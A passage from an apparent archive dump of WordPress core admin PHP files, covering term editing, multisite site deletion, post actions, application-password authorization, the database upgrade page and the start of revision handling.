<?php // Back compat hooks. if ( 'category' === $taxonomy ) { /** * Fires after the Edit Category form fields are displayed. * * @since 2.9.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_edit_form_fields'} instead. * * @param WP_Term $tag Current category term object. */ do_action_deprecated( 'edit_category_form_fields', array( $tag ), '3.0.0', '{$taxonomy}_edit_form_fields' ); } elseif ( 'link_category' === $taxonomy ) { /** * Fires after the Edit Link Category form fields are displayed. * * @since 2.9.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_edit_form_fields'} instead. * * @param WP_Term $tag Current link category term object. */ do_action_deprecated( 'edit_link_category_form_fields', array( $tag ), '3.0.0', '{$taxonomy}_edit_form_fields' ); } else { /** * Fires after the Edit Tag form fields are displayed. * * @since 2.9.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_edit_form_fields'} instead. * * @param WP_Term $tag Current tag term object. */ do_action_deprecated( 'edit_tag_form_fields', array( $tag ), '3.0.0', '{$taxonomy}_edit_form_fields' ); } /** * Fires after the Edit Term form fields are displayed. * * The dynamic portion of the hook name, `$taxonomy`, refers to * the taxonomy slug. * * Possible hook names include: * * - `category_edit_form_fields` * - `post_tag_edit_form_fields` * * @since 3.0.0 * * @param WP_Term $tag Current taxonomy term object. * @param string $taxonomy Current taxonomy slug. */ do_action( "{$taxonomy}_edit_form_fields", $tag, $taxonomy ); ?> </table> <?php // Back compat hooks. if ( 'category' === $taxonomy ) { /** This action is documented in wp-admin/edit-tags.php */ do_action_deprecated( 'edit_category_form', array( $tag ), '3.0.0', '{$taxonomy}_add_form' ); } elseif ( 'link_category' === $taxonomy ) { /** This action is documented in wp-admin/edit-tags.php */ do_action_deprecated( 'edit_link_category_form', array( $tag ), '3.0.0', '{$taxonomy}_add_form' ); } else { /** * Fires at the end of the Edit Term form. * * @since 2.5.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_edit_form'} instead. * * @param WP_Term $tag Current taxonomy term object. */ do_action_deprecated( 'edit_tag_form', array( $tag ), '3.0.0', '{$taxonomy}_edit_form' ); } /** * Fires at the end of the Edit Term form for all taxonomies. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_edit_form` * - `post_tag_edit_form` * * @since 3.0.0 * * @param WP_Term $tag Current taxonomy term object. * @param string $taxonomy Current taxonomy slug. */ do_action( "{$taxonomy}_edit_form", $tag, $taxonomy ); ?> <div class="edit-tag-actions"> <?php submit_button( __( 'Update' ), 'primary', null, false ); ?> <?php if ( current_user_can( 'delete_term', $tag->term_id ) ) : ?> <span id="delete-link"> <a class="delete" href="<?php echo esc_url( admin_url( wp_nonce_url( "edit-tags.php?action=delete&taxonomy=$taxonomy&tag_ID=$tag->term_id", 'delete-tag_' . $tag->term_id ) ) ); ?>"><?php _e( 'Delete' ); ?></a> </span> <?php endif; ?> </div> </form> </div> <?php if ( ! wp_is_mobile() ) : ?> <script> try{document.forms.edittag.name.focus();}catch(e){} </script> <?php endif; ms-delete-site.php 0000644 00000011005 15226322564 0010102 0 ustar 00 <?php /** * Multisite delete site panel. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ require_once __DIR__ . '/admin.php'; if ( ! is_multisite() ) { wp_die( __( 'Multisite support is not enabled.' ) ); } if ( ! current_user_can( 'delete_site' ) ) { wp_die( __( 'Sorry, you are not allowed to delete this site.' ) ); } if ( isset( $_GET['h'] ) && '' !== $_GET['h'] && false !== get_option( 'delete_blog_hash' ) ) { if ( hash_equals( get_option( 'delete_blog_hash' ), $_GET['h'] ) ) { wpmu_delete_blog( get_current_blog_id() ); wp_die( sprintf( /* translators: %s: Network title. */ __( 'Thank you for using %s, your site has been deleted. Happy trails to you until we meet again.' ), get_network()->site_name ) ); } else { wp_die( __( 'Sorry, the link you clicked is stale. Please select another option.' ) ); } } $blog = get_site(); $user = wp_get_current_user(); // Used in the HTML title tag. $title = __( 'Delete Site' ); $parent_file = 'tools.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; echo '<div class="wrap">'; echo '<h1>' . esc_html( $title ) . '</h1>'; if ( isset( $_POST['action'] ) && 'deleteblog' === $_POST['action'] && isset( $_POST['confirmdelete'] ) && '1' === $_POST['confirmdelete'] ) { check_admin_referer( 'delete-blog' ); $hash = wp_generate_password( 20, false ); update_option( 'delete_blog_hash', $hash, false ); $url_delete = esc_url( admin_url( 'ms-delete-site.php?h=' . $hash ) ); $switched_locale = switch_to_locale( get_locale() ); /* translators: Do not translate USERNAME, URL_DELETE, SITENAME, SITEURL: those are placeholders. */ $content = __( "Howdy ###USERNAME###, You recently clicked the 'Delete Site' link on your site and filled in a form on that page. If you really want to delete your site, click the link below. You will not be asked to confirm again so only click this link if you are absolutely certain: ###URL_DELETE### If you delete your site, please consider opening a new site here some time in the future! (But remember that your current site and username are gone forever.) Thank you for using the site, All at ###SITENAME### ###SITEURL###" ); /** * Filters the text for the email sent to the site admin when a request to delete a site in a Multisite network is submitted. * * The following strings have a special meaning and will get replaced dynamically: * * - `###USERNAME###` The current user's username. * - `###URL_DELETE###` The link to click on to confirm the site deletion. * - `###SITENAME###` The name of the site. * - `###SITEURL###` The URL to the site. * * @since 3.0.0 * * @param string $content The email text. */ $content = apply_filters( 'delete_site_email_content', $content ); $content = str_replace( '###USERNAME###', $user->user_login, $content ); $content = str_replace( '###URL_DELETE###', $url_delete, $content ); $content = str_replace( '###SITENAME###', get_network()->site_name, $content ); $content = str_replace( '###SITEURL###', network_home_url(), $content ); wp_mail( get_option( 'admin_email' ), sprintf( /* translators: %s: Site title. */ __( '[%s] Delete My Site' ), wp_specialchars_decode( get_option( 'blogname' ) ) ), $content ); if ( $switched_locale ) { restore_previous_locale(); } ?> <p><?php _e( 'Thank you. Please check your email for a link to confirm your action. Your site will not be deleted until this link is clicked.' ); ?></p> <?php } else { ?> <p> <?php printf( /* translators: %s: Network title. */ __( 'If you do not want to use your %s site any more, you can delete it using the form below. When you click <strong>Delete My Site Permanently</strong> you will be sent an email with a link in it. Click on this link to delete your site.' ), get_network()->site_name ); ?> </p> <p><?php _e( 'Remember, once deleted your site cannot be restored.' ); ?></p> <form method="post" name="deletedirect"> <?php wp_nonce_field( 'delete-blog' ); ?> <input type="hidden" name="action" value="deleteblog" /> <p><input id="confirmdelete" type="checkbox" name="confirmdelete" value="1" /> <label for="confirmdelete"><strong> <?php printf( /* translators: %s: Site address. */ __( "I'm sure I want to permanently delete my site, and I am aware I can never get it back or use %s again." ), $blog->domain . $blog->path ); ?> </strong></label></p> <?php submit_button( __( 'Delete My Site Permanently' ) ); ?> </form> <?php } echo '</div>'; require_once ABSPATH . 'wp-admin/admin-footer.php'; post.php 0000644 00000024042 15226322564 0006253 0 ustar 00 <?php /** * Edit post administration panel. * * Manage Post actions: post, edit, delete, etc. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; $parent_file = 'edit.php'; $submenu_file = 'edit.php'; $action = ! empty( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : ''; if ( isset( $_GET['post'] ) && isset( $_POST['post_ID'] ) && (int) $_GET['post'] !== (int) $_POST['post_ID'] ) { wp_die( __( 'A post ID mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 ); } elseif ( isset( $_GET['post'] ) ) { $post_id = (int) $_GET['post']; } elseif ( isset( $_POST['post_ID'] ) ) { $post_id = (int) $_POST['post_ID']; } else { $post_id = 0; } $post_ID = $post_id; /** * @global string $post_type Global post type. * @global WP_Post_Type $post_type_object Global post type object. * @global WP_Post $post Global post object. */ global $post_type, $post_type_object, $post; if ( $post_id ) { $post = get_post( $post_id ); } if ( $post ) { $post_type = $post->post_type; $post_type_object = get_post_type_object( $post_type ); } if ( isset( $_POST['post_type'] ) && $post && $post_type !== $_POST['post_type'] ) { wp_die( __( 'A post type mismatch has been detected.' ), __( 'Sorry, you are not allowed to edit this item.' ), 400 ); } if ( isset( $_POST['deletepost'] ) ) { $action = 'delete'; } elseif ( isset( $_POST['wp-preview'] ) && 'dopreview' === $_POST['wp-preview'] ) { $action = 'preview'; } $sendback = wp_get_referer(); if ( ! $sendback || str_contains( $sendback, 'post.php' ) || str_contains( $sendback, 'post-new.php' ) ) { if ( 'attachment' === $post_type ) { $sendback = admin_url( 'upload.php' ); } else { $sendback = admin_url( 'edit.php' ); if ( ! empty( $post_type ) ) { $sendback = add_query_arg( 'post_type', $post_type, $sendback ); } } } else { $sendback = remove_query_arg( array( 'trashed', 'untrashed', 'deleted', 'ids' ), $sendback ); } switch ( $action ) { case 'post-quickdraft-save': // Check nonce and capabilities. $nonce = $_REQUEST['_wpnonce']; $error_msg = false; // For output of the Quick Draft dashboard widget. require_once ABSPATH . 'wp-admin/includes/dashboard.php'; if ( ! wp_verify_nonce( $nonce, 'add-post' ) ) { $error_msg = __( 'Unable to submit this form, please refresh and try again.' ); } if ( ! current_user_can( get_post_type_object( 'post' )->cap->create_posts ) ) { exit; } if ( $error_msg ) { return wp_dashboard_quick_press( $error_msg ); } $post = get_post( $_REQUEST['post_ID'] ); check_admin_referer( 'add-' . $post->post_type ); $_POST['comment_status'] = get_default_comment_status( $post->post_type ); $_POST['ping_status'] = get_default_comment_status( $post->post_type, 'pingback' ); // Wrap Quick Draft content in the Paragraph block. if ( ! str_contains( $_POST['content'], '<!-- wp:paragraph -->' ) ) { $_POST['content'] = sprintf( '<!-- wp:paragraph -->%s<!-- /wp:paragraph -->', str_replace( array( "\r\n", "\r", "\n" ), '<br />', $_POST['content'] ) ); } edit_post(); wp_dashboard_quick_press(); exit; case 'postajaxpost': case 'post': check_admin_referer( 'add-' . $post_type ); $post_id = 'postajaxpost' === $action ? edit_post() : write_post(); redirect_post( $post_id ); exit; case 'edit': $editing = true; if ( empty( $post_id ) ) { wp_redirect( admin_url( 'post.php' ) ); exit; } if ( ! $post ) { wp_die( __( 'You attempted to edit an item that does not exist. Perhaps it was deleted?' ), 404 ); } if ( ! $post_type_object ) { wp_die( __( 'Invalid post type.' ), 400 ); } if ( ! in_array( $typenow, get_post_types( array( 'show_ui' => true ) ), true ) ) { wp_die( __( 'Sorry, you are not allowed to edit posts in this post type.' ), 403 ); } if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to edit this item.' ), 403 ); } if ( 'trash' === $post->post_status ) { wp_die( __( 'You cannot edit this item because it is in the Trash. Please restore it and try again.' ), 409 ); } if ( ! empty( $_GET['get-post-lock'] ) ) { check_admin_referer( 'lock-post_' . $post_id ); wp_set_post_lock( $post_id ); wp_redirect( get_edit_post_link( $post_id, 'url' ) ); exit; } $post_type = $post->post_type; if ( 'post' === $post_type ) { $parent_file = 'edit.php'; $submenu_file = 'edit.php'; $post_new_file = 'post-new.php'; } elseif ( 'attachment' === $post_type ) { $parent_file = 'upload.php'; $submenu_file = 'upload.php'; $post_new_file = 'media-new.php'; } else { if ( $post_type_object->show_in_menu && true !== $post_type_object->show_in_menu ) { $parent_file = $post_type_object->show_in_menu; } else { $parent_file = "edit.php?post_type=$post_type"; } $submenu_file = "edit.php?post_type=$post_type"; $post_new_file = "post-new.php?post_type=$post_type"; } $title = $post_type_object->labels->edit_item; /** * Allows replacement of the editor. * * @since 4.9.0 * * @param bool $replace Whether to replace the editor. Default false. * @param WP_Post $post Post object. */ if ( true === apply_filters( 'replace_editor', false, $post ) ) { break; } if ( use_block_editor_for_post( $post ) ) { require ABSPATH . 'wp-admin/edit-form-blocks.php'; break; } if ( ! wp_check_post_lock( $post->ID ) ) { $active_post_lock = wp_set_post_lock( $post->ID ); if ( 'attachment' !== $post_type ) { wp_enqueue_script( 'autosave' ); } } $post = get_post( $post_id, OBJECT, 'edit' ); if ( post_type_supports( $post_type, 'comments' ) ) { wp_enqueue_script( 'admin-comments' ); enqueue_comment_hotkeys_js(); } require ABSPATH . 'wp-admin/edit-form-advanced.php'; break; case 'editattachment': check_admin_referer( 'update-post_' . $post_id ); // Don't let these be changed. unset( $_POST['guid'] ); $_POST['post_type'] = 'attachment'; // Update the thumbnail filename. $newmeta = wp_get_attachment_metadata( $post_id, true ); $newmeta['thumb'] = wp_basename( $_POST['thumb'] ); wp_update_attachment_metadata( $post_id, $newmeta ); // Intentional fall-through to trigger the edit_post() call. case 'editpost': check_admin_referer( 'update-post_' . $post_id ); $post_id = edit_post(); // Session cookie flag that the post was saved. if ( isset( $_COOKIE['wp-saving-post'] ) && $_COOKIE['wp-saving-post'] === $post_id . '-check' ) { setcookie( 'wp-saving-post', $post_id . '-saved', time() + DAY_IN_SECONDS, ADMIN_COOKIE_PATH, COOKIE_DOMAIN, is_ssl() ); } redirect_post( $post_id ); // Send user on their way while we keep working. exit; case 'trash': check_admin_referer( 'trash-post_' . $post_id ); if ( ! $post ) { wp_die( __( 'The item you are trying to move to the Trash no longer exists.' ), 410 ); } if ( ! $post_type_object ) { wp_die( __( 'Invalid post type.' ), 400 ); } if ( ! current_user_can( 'delete_post', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to move this item to the Trash.' ), 403 ); } $user_id = wp_check_post_lock( $post_id ); if ( $user_id ) { $user = get_userdata( $user_id ); /* translators: %s: User's display name. */ wp_die( sprintf( __( 'You cannot move this item to the Trash. %s is currently editing.' ), $user->display_name ), 409 ); } if ( ! wp_trash_post( $post_id ) ) { wp_die( __( 'Error in moving the item to Trash.' ), 500 ); } wp_redirect( add_query_arg( array( 'trashed' => 1, 'ids' => $post_id, ), $sendback ) ); exit; case 'untrash': check_admin_referer( 'untrash-post_' . $post_id ); if ( ! $post ) { wp_die( __( 'The item you are trying to restore from the Trash no longer exists.' ), 410 ); } if ( ! $post_type_object ) { wp_die( __( 'Invalid post type.' ), 400 ); } if ( ! current_user_can( 'delete_post', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to restore this item from the Trash.' ), 403 ); } if ( ! wp_untrash_post( $post_id ) ) { wp_die( __( 'Error in restoring the item from Trash.' ), 500 ); } $sendback = add_query_arg( array( 'untrashed' => 1, 'ids' => $post_id, ), $sendback ); wp_redirect( $sendback ); exit; case 'delete': check_admin_referer( 'delete-post_' . $post_id ); if ( ! $post ) { wp_die( __( 'This item has already been deleted.' ), 410 ); } if ( ! $post_type_object ) { wp_die( __( 'Invalid post type.' ), 400 ); } if ( ! current_user_can( 'delete_post', $post_id ) ) { wp_die( __( 'Sorry, you are not allowed to delete this item.' ), 403 ); } if ( 'attachment' === $post->post_type ) { $force = ( ! MEDIA_TRASH ); if ( ! wp_delete_attachment( $post_id, $force ) ) { wp_die( __( 'Error in deleting the attachment.' ), 500 ); } } else { if ( ! wp_delete_post( $post_id, true ) ) { wp_die( __( 'Error in deleting the item.' ), 500 ); } } wp_redirect( add_query_arg( 'deleted', 1, $sendback ) ); exit; case 'preview': check_admin_referer( 'update-post_' . $post_id ); $url = post_preview(); wp_redirect( $url ); exit; case 'toggle-custom-fields': check_admin_referer( 'toggle-custom-fields', 'toggle-custom-fields-nonce' ); $current_user_id = get_current_user_id(); if ( $current_user_id ) { $enable_custom_fields = (bool) get_user_meta( $current_user_id, 'enable_custom_fields', true ); update_user_meta( $current_user_id, 'enable_custom_fields', ! $enable_custom_fields ); } wp_safe_redirect( wp_get_referer() ); exit; default: /** * Fires for a given custom post action request. * * The dynamic portion of the hook name, `$action`, refers to the custom post action. * * @since 4.6.0 * * @param int $post_id Post ID sent with the request. */ do_action( "post_action_{$action}", $post_id ); wp_redirect( admin_url( 'edit.php' ) ); exit; } // End switch. require_once ABSPATH . 'wp-admin/admin-footer.php'; authorize-application.php 0000644 00000024137 15226322564 0011606 0 ustar 00 <?php /** * Authorize Application Screen * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; $error = null; $new_password = ''; // This is the no-js fallback script. Generally this will all be handled by `auth-app.js`. if ( isset( $_POST['action'] ) && 'authorize_application_password' === $_POST['action'] ) { check_admin_referer( 'authorize_application_password' ); $success_url = $_POST['success_url']; $reject_url = $_POST['reject_url']; $app_name = $_POST['app_name']; $app_id = $_POST['app_id']; $redirect = ''; if ( isset( $_POST['reject'] ) ) { if ( $reject_url ) { $redirect = $reject_url; } else { $redirect = admin_url(); } } elseif ( isset( $_POST['approve'] ) ) { $created = WP_Application_Passwords::create_new_application_password( get_current_user_id(), array( 'name' => $app_name, 'app_id' => $app_id, ) ); if ( is_wp_error( $created ) ) { $error = $created; } else { list( $new_password ) = $created; if ( $success_url ) { $redirect = add_query_arg( array( 'site_url' => urlencode( site_url() ), 'user_login' => urlencode( wp_get_current_user()->user_login ), 'password' => urlencode( $new_password ), ), $success_url ); } } } if ( $redirect ) { // Explicitly not using wp_safe_redirect b/c sends to arbitrary domain. wp_redirect( $redirect ); exit; } } // Used in the HTML title tag. $title = __( 'Authorize Application' ); $app_name = ! empty( $_REQUEST['app_name'] ) ? $_REQUEST['app_name'] : ''; $app_id = ! empty( $_REQUEST['app_id'] ) ? $_REQUEST['app_id'] : ''; $success_url = ! empty( $_REQUEST['success_url'] ) ? $_REQUEST['success_url'] : null; if ( ! empty( $_REQUEST['reject_url'] ) ) { $reject_url = $_REQUEST['reject_url']; } elseif ( $success_url ) { $reject_url = add_query_arg( 'success', 'false', $success_url ); } else { $reject_url = null; } $user = wp_get_current_user(); $request = compact( 'app_name', 'app_id', 'success_url', 'reject_url' ); $is_valid = wp_is_authorize_application_password_request_valid( $request, $user ); if ( is_wp_error( $is_valid ) ) { wp_die( __( 'The Authorize Application request is not allowed.' ) . ' ' . implode( ' ', $is_valid->get_error_messages() ), __( 'Cannot Authorize Application' ) ); } if ( wp_is_site_protected_by_basic_auth( 'front' ) ) { wp_die( __( 'Your website appears to use Basic Authentication, which is not currently compatible with application passwords.' ), __( 'Cannot Authorize Application' ), array( 'response' => 501, 'link_text' => __( 'Go Back' ), 'link_url' => $reject_url ? add_query_arg( 'error', 'disabled', $reject_url ) : admin_url(), ) ); } if ( ! wp_is_application_passwords_available_for_user( $user ) ) { if ( wp_is_application_passwords_available() ) { $message = __( 'Application passwords are not available for your account. Please contact the site administrator for assistance.' ); } else { $message = __( 'Application passwords are not available.' ); } wp_die( $message, __( 'Cannot Authorize Application' ), array( 'response' => 501, 'link_text' => __( 'Go Back' ), 'link_url' => $reject_url ? add_query_arg( 'error', 'disabled', $reject_url ) : admin_url(), ) ); } wp_enqueue_script( 'auth-app' ); wp_localize_script( 'auth-app', 'authApp', array( 'site_url' => site_url(), 'user_login' => $user->user_login, 'success' => $success_url, 'reject' => $reject_url ? $reject_url : admin_url(), ) ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <?php if ( is_wp_error( $error ) ) { wp_admin_notice( $error->get_error_message(), array( 'type' => 'error', ) ); } ?> <div class="card auth-app-card"> <h2 class="title"><?php _e( 'An application would like to connect to your account.' ); ?></h2> <?php if ( $app_name ) : ?> <p> <?php printf( /* translators: %s: Application name. */ __( 'Would you like to give the application identifying itself as %s access to your account? You should only do this if you trust the application in question.' ), '<strong>' . esc_html( $app_name ) . '</strong>' ); ?> </p> <?php else : ?> <p><?php _e( 'Would you like to give this application access to your account? You should only do this if you trust the application in question.' ); ?></p> <?php endif; ?> <?php if ( is_multisite() ) { $blogs = get_blogs_of_user( $user->ID, true ); $blogs_count = count( $blogs ); if ( $blogs_count > 1 ) { ?> <p> <?php /* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */ $message = _n( 'This will grant access to <a href="%1$s">the %2$s site in this installation that you have permissions on</a>.', 'This will grant access to <a href="%1$s">all %2$s sites in this installation that you have permissions on</a>.', $blogs_count ); if ( is_super_admin() ) { /* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */ $message = _n( 'This will grant access to <a href="%1$s">the %2$s site on the network as you have Super Admin rights</a>.', 'This will grant access to <a href="%1$s">all %2$s sites on the network as you have Super Admin rights</a>.', $blogs_count ); } printf( $message, admin_url( 'my-sites.php' ), number_format_i18n( $blogs_count ) ); ?> </p> <?php } } ?> <?php if ( $new_password ) : $message = '<p class="application-password-display"> <label for="new-application-password-value">' . sprintf( /* translators: %s: Application name. */ esc_html__( 'Your new password for %s is:' ), '<strong>' . esc_html( $app_name ) . '</strong>' ) . ' </label> <input id="new-application-password-value" type="text" class="code" readonly="readonly" value="' . esc_attr( WP_Application_Passwords::chunk_password( $new_password ) ) . '" /> </p> <p>' . __( 'Be sure to save this in a safe location. You will not be able to retrieve it.' ) . '</p>'; $args = array( 'type' => 'success', 'additional_classes' => array( 'notice-alt', 'below-h2' ), 'paragraph_wrap' => false, ); wp_admin_notice( $message, $args ); /** * Fires in the Authorize Application Password new password section in the no-JS version. * * In most cases, this should be used in combination with the {@see 'wp_application_passwords_approve_app_request_success'} * action to ensure that both the JS and no-JS variants are handled. * * @since 5.6.0 * @since 5.6.1 Corrected action name and signature. * * @param string $new_password The newly generated application password. * @param array $request The array of request data. All arguments are optional and may be empty. * @param WP_User $user The user authorizing the application. */ do_action( 'wp_authorize_application_password_form_approved_no_js', $new_password, $request, $user ); else : ?> <form action="<?php echo esc_url( admin_url( 'authorize-application.php' ) ); ?>" method="post" class="form-wrap"> <?php wp_nonce_field( 'authorize_application_password' ); ?> <input type="hidden" name="action" value="authorize_application_password" /> <input type="hidden" name="app_id" value="<?php echo esc_attr( $app_id ); ?>" /> <input type="hidden" name="success_url" value="<?php echo esc_url( $success_url ); ?>" /> <input type="hidden" name="reject_url" value="<?php echo esc_url( $reject_url ); ?>" /> <div class="form-field"> <label for="app_name"><?php _e( 'New Application Password Name' ); ?></label> <input type="text" id="app_name" name="app_name" value="<?php echo esc_attr( $app_name ); ?>" required /> </div> <?php /** * Fires in the Authorize Application Password form before the submit buttons. * * @since 5.6.0 * * @param array $request { * The array of request data. All arguments are optional and may be empty. * * @type string $app_name The suggested name of the application. * @type string $success_url The URL the user will be redirected to after approving the application. * @type string $reject_url The URL the user will be redirected to after rejecting the application. * } * @param WP_User $user The user authorizing the application. */ do_action( 'wp_authorize_application_password_form', $request, $user ); ?> <?php submit_button( __( 'Yes, I approve of this connection' ), 'primary', 'approve', false, array( 'aria-describedby' => 'description-approve', ) ); ?> <p class="description" id="description-approve"> <?php if ( $success_url ) { printf( /* translators: %s: The URL the user is being redirected to. */ __( 'You will be sent to %s' ), '<strong><code>' . esc_html( add_query_arg( array( 'site_url' => site_url(), 'user_login' => $user->user_login, 'password' => '[------]', ), $success_url ) ) . '</code></strong>' ); } else { _e( 'You will be given a password to manually enter into the application in question.' ); } ?> </p> <?php submit_button( __( 'No, I do not approve of this connection' ), 'secondary', 'reject', false, array( 'aria-describedby' => 'description-reject', ) ); ?> <p class="description" id="description-reject"> <?php if ( $reject_url ) { printf( /* translators: %s: The URL the user is being redirected to. */ __( 'You will be sent to %s' ), '<strong><code>' . esc_html( $reject_url ) . '</code></strong>' ); } else { _e( 'You will be returned to the WordPress Dashboard, and no changes will be made.' ); } ?> </p> </form> <?php endif; ?> </div> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; upgrade.php 0000644 00000014366 15226322564 0006725 0 ustar 00 <?php /** * Upgrade WordPress Page. * * @package WordPress * @subpackage Administration */ /** * We are upgrading WordPress. * * @since 1.5.1 * @var bool */ define( 'WP_INSTALLING', true ); /** Load WordPress Bootstrap */ require dirname( __DIR__ ) . '/wp-load.php'; nocache_headers(); require_once ABSPATH . 'wp-admin/includes/upgrade.php'; delete_site_transient( 'update_core' ); $step = $_GET['step'] ?? 0; // Do it. No output. if ( 'upgrade_db' === $step ) { wp_upgrade(); die( '0' ); } /** * @global string $wp_version The WordPress version string. * @global string $required_php_version The minimum required PHP version string. * @global string[] $required_php_extensions The names of required PHP extensions. * @global string $required_mysql_version The minimum required MySQL version string. * @global wpdb $wpdb WordPress database abstraction object. */ global $wp_version, $required_php_version, $required_php_extensions, $required_mysql_version, $wpdb; $step = (int) $step; $php_version = PHP_VERSION; $mysql_version = $wpdb->db_version(); $php_compat = version_compare( $php_version, $required_php_version, '>=' ); if ( file_exists( WP_CONTENT_DIR . '/db.php' ) && empty( $wpdb->is_mysql ) ) { $mysql_compat = true; } else { $mysql_compat = version_compare( $mysql_version, $required_mysql_version, '>=' ); } $missing_extensions = array(); if ( isset( $required_php_extensions ) && is_array( $required_php_extensions ) ) { foreach ( $required_php_extensions as $extension ) { if ( extension_loaded( $extension ) ) { continue; } $missing_extensions[] = sprintf( /* translators: 1: URL to WordPress release notes, 2: WordPress version number, 3: The PHP extension name needed. */ __( 'You cannot upgrade because <a href="%1$s">WordPress %2$s</a> requires the %3$s PHP extension.' ), $version_url, $wp_version, $extension ); } } header( 'Content-Type: ' . get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' ) ); ?> <!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="Content-Type" content="<?php bloginfo( 'html_type' ); ?>; charset=<?php echo get_option( 'blog_charset' ); ?>" /> <meta name="robots" content="noindex,nofollow" /> <title><?php _e( 'WordPress › Update' ); ?></title> <?php wp_admin_css( 'install', true ); ?> </head> <body class="wp-core-ui admin-color-modern"> <p id="logo"><?php _e( 'WordPress' ); ?></p> <?php if ( (int) get_option( 'db_version' ) === $wp_db_version || ! is_blog_installed() ) : ?> <h1><?php _e( 'No Update Required' ); ?></h1> <p><?php _e( 'Your WordPress database is already up to date!' ); ?></p> <p class="step"><a class="button button-large" href="<?php echo esc_url( get_option( 'home' ) ); ?>/"><?php _e( 'Continue' ); ?></a></p> <?php elseif ( ! $php_compat || ! $mysql_compat ) : $version_url = sprintf( /* translators: %s: WordPress version. */ esc_url( __( 'https://wordpress.org/documentation/wordpress-version/version-%s/' ) ), sanitize_title( $wp_version ) ); $php_update_message = '</p><p>' . sprintf( /* translators: %s: URL to Update PHP page. */ __( '<a href="%s">Learn more about updating PHP</a>.' ), esc_url( wp_get_update_php_url() ) ); $annotation = wp_get_update_php_annotation(); if ( $annotation ) { $php_update_message .= '</p><p><em>' . $annotation . '</em>'; } if ( ! $mysql_compat && ! $php_compat ) { $message = sprintf( /* translators: 1: URL to WordPress release notes, 2: WordPress version number, 3: Minimum required PHP version number, 4: Minimum required MySQL version number, 5: Current PHP version number, 6: Current MySQL version number. */ __( 'You cannot update because <a href="%1$s">WordPress %2$s</a> requires PHP version %3$s or higher and MySQL version %4$s or higher. You are running PHP version %5$s and MySQL version %6$s.' ), $version_url, $wp_version, $required_php_version, $required_mysql_version, $php_version, $mysql_version ) . $php_update_message; } elseif ( ! $php_compat ) { $message = sprintf( /* translators: 1: URL to WordPress release notes, 2: WordPress version number, 3: Minimum required PHP version number, 4: Current PHP version number. */ __( 'You cannot update because <a href="%1$s">WordPress %2$s</a> requires PHP version %3$s or higher. You are running version %4$s.' ), $version_url, $wp_version, $required_php_version, $php_version ) . $php_update_message; } elseif ( ! $mysql_compat ) { $message = sprintf( /* translators: 1: URL to WordPress release notes, 2: WordPress version number, 3: Minimum required MySQL version number, 4: Current MySQL version number. */ __( 'You cannot update because <a href="%1$s">WordPress %2$s</a> requires MySQL version %3$s or higher. You are running version %4$s.' ), $version_url, $wp_version, $required_mysql_version, $mysql_version ); } echo '<p>' . $message . '</p>'; elseif ( count( $missing_extensions ) > 0 ) : echo '<p>' . implode( '</p><p>', $missing_extensions ) . '</p>'; else : switch ( $step ) : case 0: $goback = wp_get_referer(); if ( $goback ) { $goback = sanitize_url( $goback ); $goback = urlencode( $goback ); } ?> <h1><?php _e( 'Database Update Required' ); ?></h1> <p><?php _e( 'WordPress has been updated! Next and final step is to update your database to the newest version.' ); ?></p> <p><?php _e( 'The database update process may take a little while, so please be patient.' ); ?></p> <p class="step"><a class="button button-large button-primary" href="upgrade.php?step=1&backto=<?php echo $goback; ?>"><?php _e( 'Update WordPress Database' ); ?></a></p> <?php break; case 1: wp_upgrade(); $backto = ! empty( $_GET['backto'] ) ? wp_unslash( urldecode( $_GET['backto'] ) ) : __get_option( 'home' ) . '/'; $backto = esc_url( $backto ); $backto = wp_validate_redirect( $backto, __get_option( 'home' ) . '/' ); ?> <h1><?php _e( 'Update Complete' ); ?></h1> <p><?php _e( 'Your WordPress database has been successfully updated!' ); ?></p> <p class="step"><a class="button button-large" href="<?php echo $backto; ?>"><?php _e( 'Continue' ); ?></a></p> <?php break; endswitch; endif; ?> </body> </html> revision.php 0000644 00000013314 15226322564 0007124 0 ustar 00 <?php /** * Revisions administration panel * * Requires wp-admin/includes/revision.php. * * @package WordPress * @subpackage Administration * @since 2.6.0 */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/includes/revision.php'; /** * @global int $revision_id Optional. The revision ID. * @global string $action The action to take. Accepts 'restore', 'view', or 'edit'. * @global int $from The revision to compare from. * @global int $to Optional, required if revision missing. The revision to compare to. */ $revision_id = ! empty( $_REQUEST['revision'] ) ? absint( $_REQUEST['revision'] ) : 0; $action = ! empty( $_REQUEST['action'] ) ? sanitize_text_field( $_REQUEST['action'] ) : ''; $from = ! empty( $_REQUEST['from'] ) && is_numeric( $_REQUEST['from'] ) ? absint( $_REQUEST['from'] ) : null; $to = ! empty( $_REQUEST['to'] ) && is_numeric( $_REQUEST['to'] ) ? absint( $_REQUEST['to'] ) : null; if ( ! $revision_id ) { $revision_id = $to; } $redirect = 'edit.php'; switch ( $action ) { case 'restore': $revision = wp_get_post_revision( $revision_id ); if ( ! $revision ) { break; } if ( ! current_user_can( 'edit_post', $revision->post_parent ) ) { break; } $post = get_post( $revision->post_parent ); if ( ! $post ) { break; } // Don't restore if revisions are disabled and this is not an autosave. if ( ! wp_revisions_enabled( $post ) && 